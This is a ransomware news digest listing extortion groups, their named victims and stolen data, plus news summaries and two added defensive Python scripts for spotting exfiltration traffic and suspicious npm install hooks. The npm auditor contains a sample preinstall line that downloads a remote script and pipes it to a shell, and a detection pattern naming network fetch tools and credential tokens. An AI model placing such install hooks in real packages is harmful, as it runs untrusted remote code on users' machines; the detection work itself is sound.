Latest Ransomware News and New File Extensions
-
Clop:
- New Encrypted File Extension: Not specified.
- Attack Methods: Data exfiltration and extortion, specifically targeting and stealing data from Oracle E-Business Suite servers.
- Targets: Educational institutions, such as Dartmouth College.
- Decryption Status: Not applicable, as the primary threat is data leakage rather than file encryption.
- Source: Dartmouth College confirms data breach after Clop extortion attack
-
Akira:
- New Encrypted File Extension: Not specified.
- Attack Methods: Data theft and extortion by threatening to publish stolen sensitive data. Leaked data includes corporate documents, employee and client PII (SSNs, passports), and financial records.
- Targets: Bankruptcy trustee services (the Standing Chapter 13 Trustee for the District of Minnesota), landscaping services, and food production companies.
- Decryption Status: Not mentioned; the focus is on data leaks.
- Source: 🏴☠️ Akira has just published a new victim : Standing Chapter 13 Trustee
-
Qilin:
- New Encrypted File Extension: Not specified.
- Attack Methods: Data exfiltration and publication of victims on their leak site to extort payment.
- Targets: A wide range of sectors including senior living facilities (Nottingham Village), industrial manufacturing (HYTORC, Zecher), engineering (Blue Projects), electronics (Cal-Comp Electronics), and professional services (The Hunnicutt Law Group).
- Decryption Status: Not mentioned.
- Source: 🏴☠️ Qilin has just published a new victim : Nottingham Village
-
Thegentlemen:
- New Encrypted File Extension: Not specified.
- Attack Methods: Data theft and extortion with detailed victim profiling, including company revenue and operational information, on their leak site.
- Targets: Primarily focused on companies in South America and Southeast Asia, including mining (Ecuacorriente S.A.), healthcare (AiHealth, KIM Dental), and real estate development (Singapore City Development).
- Decryption Status: Not mentioned.
- Source: 🏴☠️ Thegentlemen has just published a new victim : Ecuacorriente S.A.
-
Sinobi:
- New Encrypted File Extension: Not specified.
- Attack Methods: Data breach and extortion via public shaming.
- Targets: Diverse small to medium-sized businesses across various sectors including construction (Rempe Construction), healthcare (StatMedPlus LLC, Advanced Dental), recruiting (Access Search), and cultural institutions (Homestead Museum).
- Decryption Status: Not mentioned.
- Source: 🏴☠️ Sinobi has just published a new victim : Rempe Construction
-
Ransomhouse:
- New Encrypted File Extension: Not specified.
- Attack Methods: Data theft and extortion.
- Targets: Government agencies, including the Swedish Arts Council.
- Decryption Status: Not mentioned.
- Source: 🏴☠️ Ransomhouse has just published a new victim : Swedish Arts Council
-
Interlock:
- New Encrypted File Extension: Not specified.
- Attack Methods: Data theft and extortion, specifically leaking sensitive client/patient data (SSNs, medical histories) and mocking the victims’ poor security.
- Targets: Healthcare (Issaqueena Pediatric Dentistry) and engineering firms (Westrian Group).
- Decryption Status: Not mentioned.
- Source: 🏴☠️ Interlock has just published a new victim : Issaqueena Pediatric Dentistry
Observations and Further Recommendations
- A significant number of ransomware groups are actively targeting a broad and diverse range of global industries, including healthcare, legal, finance, manufacturing, government, and education.
- The predominant tactic observed is data exfiltration for extortion: gangs threaten to leak stolen sensitive information, either alongside file encryption ("double extortion") or, as in Clop's Oracle E-Business Suite campaign, without encrypting anything at all.
- Ransomware is now more common, and often more damaging, than physical disasters for many organizations; in the CISO survey summarized under News Details, 72% of more than 500 respondents said their organization had dealt with ransomware in the previous year.
- The continuous attacks highlight the need for layered defenses and tested incident response and business continuity plans. Backups remain essential against encryption but do nothing against the data-leak threat that dominates this list; countering that requires prompt patching of internet-facing applications (the Oracle E-Business Suite, WSUS and Oracle Identity Manager flaws covered below were all exploited), limiting the sensitive data kept on those systems, and monitoring outbound traffic for unusual transfers.
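Because every group in this digest relies on moving large volumes of data out of the victim network before extortion, the most useful generic detection is a volume-per-destination check on egress logs. The script below is an added example written for this page, not code from any vendor or source cited here. The log format (space-separated ISO timestamp, source IP, destination IP, bytes sent), the 1 GB per hour threshold, the business-hours window and the list of internal networks are all assumptions; the sample lines are constructed.

```python
"""Flag hosts pushing unusually large volumes to one external destination,
the traffic pattern behind exfiltration-for-extortion attacks.

Added example for this digest; not code from any cited vendor. Log format,
thresholds and internal ranges are assumptions to adapt to your environment."""
from collections import defaultdict
from datetime import datetime, timedelta
import ipaddress

# Constructed sample: one workstation quietly pushing ~1.6 GB to a single
# outside host at 02:00, plus ordinary daytime traffic and an internal copy.
SAMPLE_LOG = """\
2025-11-24T02:10:05 10.0.12.7 203.0.113.50 412000000
2025-11-24T02:14:41 10.0.12.7 203.0.113.50 398000000
2025-11-24T02:19:58 10.0.12.7 203.0.113.50 441000000
2025-11-24T02:25:12 10.0.12.7 203.0.113.50 389000000
2025-11-24T09:01:00 10.0.12.9 198.51.100.20 2400000
2025-11-24T09:03:00 10.0.12.9 198.51.100.20 1900000
2025-11-24T09:05:00 10.0.12.7 10.0.3.15 900000000
"""

BYTES_THRESHOLD = 1_000_000_000          # 1 GB to one destination per window (assumed)
WINDOW = timedelta(hours=1)
BUSINESS_HOURS = range(7, 20)            # 07:00-19:59 local; transfers outside are off-hours
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]  # assumed org ranges


def parse_line(line):
    ts, src, dst, nbytes = line.split()
    return datetime.fromisoformat(ts), src, dst, int(nbytes)


def is_external(ip):
    """True when the address is outside the organisation's own ranges."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def find_exfil_candidates(log_text, threshold=BYTES_THRESHOLD, window=WINDOW):
    """Return one alert per (src, dst) pair whose bytes to an external host
    exceed `threshold` inside any sliding `window`."""
    flows = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, nbytes = parse_line(line)
        if is_external(dst):
            flows[(src, dst)].append((ts, nbytes))

    alerts = []
    for (src, dst), events in flows.items():
        events.sort()
        start, total = 0, 0
        for ts, nbytes in events:
            total += nbytes
            # Advance the window's left edge until the oldest event fits.
            while ts - events[start][0] > window:
                total -= events[start][1]
                start += 1
            if total > threshold:
                first_ts = events[start][0]
                alerts.append({
                    "src": src, "dst": dst, "bytes": total,
                    "window_start": first_ts.isoformat(),
                    "off_hours": first_ts.hour not in BUSINESS_HOURS,
                })
                break  # one alert per pair is enough for triage
    return alerts


if __name__ == "__main__":
    for a in find_exfil_candidates(SAMPLE_LOG):
        when = "off-hours" if a["off_hours"] else "business hours"
        print(f"{a['src']} -> {a['dst']}: {a['bytes']:,} bytes from "
              f"{a['window_start']} ({when})")
```

The sliding window matters: exfiltration tooling often splits archives into many moderate uploads, none of which trips a per-connection size rule. Tune the threshold per host role (a backup server legitimately pushes far more than a dentist's front-desk PC) and treat off-hours hits as higher priority.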
News Details
- Dartmouth College confirms data breach after Clop extortion attack: Dartmouth College has disclosed a data breach after the Clop extortion gang leaked data allegedly stolen from the school’s Oracle E-Business Suite servers on its dark web leak site.
- Aligning VMware migration with business continuity: In recent years, an even more persistent threat has emerged. Cyber incidents, particularly ransomware, are now more common—and often, more damaging—than physical disasters. In a recent survey of more than 500 CISOs, almost three-quarters (72%) said their organization had dealt with ransomware in the previous year.
- ShadowPad Malware Actively Exploits WSUS Vulnerability for Full System Access: A recently patched security flaw in Microsoft Windows Server Update Services (WSUS) has been exploited by threat actors to distribute malware known as ShadowPad.
- CISA Warns of Active Spyware Campaigns Hijacking High-Value Signal and WhatsApp Users: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday issued an alert warning of bad actors actively leveraging commercial spyware and remote access trojans (RATs) to target users of mobile messaging applications.
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware: Cybersecurity researchers have disclosed details of a new campaign that has leveraged Blender Foundation files to deliver an information stealer known as StealC V2.
- 3 SOC Challenges You Need to Solve Before 2026: 2026 will mark a pivotal shift in cybersecurity. Threat actors are moving from experimenting with AI to making it their primary weapon, using it to scale attacks, automate reconnaissance, and craft hyper-realistic social engineering campaigns.
- New Fluent Bit Flaws Expose Cloud to RCE and Stealthy Infrastructure Intrusions: Cybersecurity researchers have discovered five vulnerabilities in Fluent Bit, an open-source and lightweight telemetry agent, that could be chained to compromise and take over cloud infrastructures.
- Second Sha1-Hulud Wave Affects 25,000+ Repositories via npm Preinstall Credential Theft: Multiple security vendors are sounding the alarm about a second wave of attacks targeting the npm registry in a manner that’s reminiscent of the Shai-Hulud attack.
- Chinese DeepSeek-R1 AI Generates Insecure Code When Prompts Mention Tibet or Uyghurs: New research from CrowdStrike has revealed that DeepSeek’s artificial intelligence (AI) reasoning model DeepSeek-R1 produces more security vulnerabilities in response to prompts that contain topics deemed politically sensitive by China.
- ClickFix attack uses fake Windows Update screen to push malware: New ClickFix attack variants have been observed where threat actors trick users with a realistic-looking Windows Update animation in a full-screen browser page and hide the malicious code inside images.
- Harvard University discloses data breach affecting alumni, donors: Harvard University disclosed over the weekend that its Alumni Affairs and Development systems were compromised in a voice phishing attack, exposing the personal information of students, alumni, donors, staff, and faculty members.
- ShadowRay 2.0 Turns AI Clusters into Crypto Botnets: A threat actor is leveraging a flaw in the Ray framework to hijack AI infrastructure worldwide and distribute a self-propagating cryptomining and data theft botnet.
- Critical Flaw in Oracle Identity Manager Under Exploitation: The exploitation of CVE-2025-61757 follows a breach of Oracle Cloud earlier this year as well as a recent extortion campaign targeting Oracle E-Business Suite customers.
- 🏴☠️ Akira has just published a new victim : Standing Chapter 13 Trustee: The Standing Chapter 13 Trustee District of Minnesota provides services related to bankruptcy cases under Chapter 13, assisting debtors with payment information and case-related resources. We will upload 44 GB of corporate documents soon.
- 🏴☠️ Payoutsking has just published a new victim : Se:
- 🏴☠️ Silentransomgroup has just published a new victim : Mitchell Silberberg & Knupp: Established in 1908, Mitchell Silberberg & Knupp (MSK), is a firm that provides services such as Ventu…
- 🏴☠️ Sinobi has just published a new victim : Rempe Construction: Rempe Construction specializes in construction services, offering expertise to various clients in need of reliable building solutions. With a focus on quality and customer satisfaction, they deliver tailored construction projects.
- 🏴☠️ Rhysida has just published a new victim : Marlex Human Capital: Marlex Human Capital
- 🏴☠️ Nightspire has just published a new victim : Balkrishna Paper Mills LTD, India: Balkrishna Paper Mills LTD, India
- 🏴☠️ Qilin has just published a new victim : Nottingham Village: N/A
- 🏴☠️ Thegentlemen has just published a new victim : Ecuacorriente S.A.: Ecuacorriente S.A is a mining company. It is operated by China Railway Construction Copper Crown Investment Co., Ltd. Revenue – $1.11 billion USD.
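The Sha1-Hulud item above turns on one npm behaviour: lifecycle scripts such as `preinstall` and `postinstall` run automatically, with the installing user's privileges and environment, the moment a package is installed. The audit below is an added example written for this page, not code from any of the vendors reporting the campaign. It lists every install-time hook in a tree of package.json files and flags commands matching a heuristic set of suspicious tokens; the sample package.json documents are constructed and the token list is an assumption to tune.

```python
"""List npm lifecycle scripts that run on install and flag suspicious ones.

Added example for this digest; not code from any cited vendor. The sample
packages are constructed and the SUSPICIOUS pattern is a heuristic assumption."""
import json
import os
import re

# npm executes these hooks during `npm install` without any user action.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Tokens that rarely belong in a legitimate install step (assumed heuristic):
# network fetches, inline node code, encoding tricks, credential files/vars.
SUSPICIOUS = re.compile(
    r"\bcurl\b|\bwget\b|node\s+-e\b|base64|\.npmrc|\$\{?HOME|"
    r"GITHUB_TOKEN|NPM_TOKEN|AWS_SECRET_ACCESS_KEY",
    re.IGNORECASE,
)


def audit_package(name, package_json):
    """Return a finding for every lifecycle hook in one parsed package.json."""
    findings = []
    scripts = package_json.get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if cmd:
            findings.append({
                "package": name,
                "hook": hook,
                "command": cmd,
                "suspicious": bool(SUSPICIOUS.search(cmd)),
            })
    return findings


def audit_node_modules(root):
    """Walk a real node_modules tree (scoped packages included) and audit
    every package.json it contains."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        path = os.path.join(dirpath, "package.json")
        try:
            with open(path, encoding="utf-8") as fh:
                doc = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest; skip it
        findings.extend(audit_package(doc.get("name", path), doc))
    return findings


# Constructed samples: a native add-on that legitimately compiles on install,
# a package whose preinstall pulls and runs remote code, and a plain library.
SAMPLES = {
    "native-addon": {"name": "native-addon",
                     "scripts": {"install": "node-gyp rebuild"}},
    "left-padding-utils": {"name": "left-padding-utils",
                           "scripts": {"preinstall": "curl -s https://example.invalid/x.sh | sh",
                                       "test": "jest"}},
    "plain-lib": {"name": "plain-lib", "scripts": {"test": "mocha"}},
}


def audit_samples():
    findings = []
    for name, doc in SAMPLES.items():
        findings.extend(audit_package(name, doc))
    return findings


if __name__ == "__main__":
    import sys
    results = audit_node_modules(sys.argv[1]) if len(sys.argv) > 1 else audit_samples()
    for f in results:
        label = "SUSPICIOUS" if f["suspicious"] else "review"
        print(f"{label:10} {f['package']}: {f['hook']} -> {f['command']}")
```

Run it against a real tree with `python audit.py node_modules`. Even a benign-looking hook deserves review, since a compromised maintainer account can change the command in the next patch release; the durable control is installing with `npm ci --ignore-scripts` (or `npm config set ignore-scripts true`) in CI and building native modules deliberately, so that no package runs code just by being installed.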